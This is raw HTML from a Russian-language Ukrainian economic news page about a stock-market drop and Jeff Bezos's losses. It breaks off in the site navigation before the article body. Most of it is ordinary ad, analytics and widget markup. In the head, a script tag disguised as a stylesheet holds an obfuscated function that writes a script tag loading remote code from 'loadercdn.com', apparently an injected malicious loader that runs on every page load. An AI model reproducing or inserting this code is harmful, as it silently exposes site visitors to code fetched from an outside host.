<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Черный четверг на фондовом рынке США. Богачи расстались с миллиардами | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Черный четверг на фондовом рынке США. Богачи расстались с миллиардами "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-e1599216385502.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="293" /><meta property="og:image:alt" content="Черный четверг на фондовом рынке США. Богачи расстались с миллиардами " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Состояние основателя Amazon Джеффа Безоса за один день сократилось на 10,5 миллиардов долларов ." /><meta property="og:description" content="Состояние основателя Amazon Джеффа Безоса за один день сократилось на 10,5 миллиардов долларов ." /><meta name="keywords" content="акции,обвал акций,фондовый рынок сша,новости экономики" /><link rel="canonical" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" /><meta property="og:url" content="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4816709';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4816709&amp;a=6430" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_abroad-ukr/full/409-chornij-chetver-na-fondovomu-rinku-ssha-bagatii-vstratili-milyardi-dollariv">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.85</td><td>27.50</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>33.07</td><td>32.23</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.39</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>500.22</td><td>0.00</td><td>16:05 03.09.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1319.74</td><td>0.00</td><td>16:15 04.09.2020</td> </tr> <tr> <td>RTS</td><td>1226.76</td><td>0.29</td><td>16:16 04.09.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>44.02</td><td>-0.11</td><td style="text-transform:uppercase;">Sep</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>41.41</td><td>+0.10</td><td style="text-transform:uppercase;">Sep</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>352.50</td><td>+3.07</td><td style="text-transform:uppercase;">Sep</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a 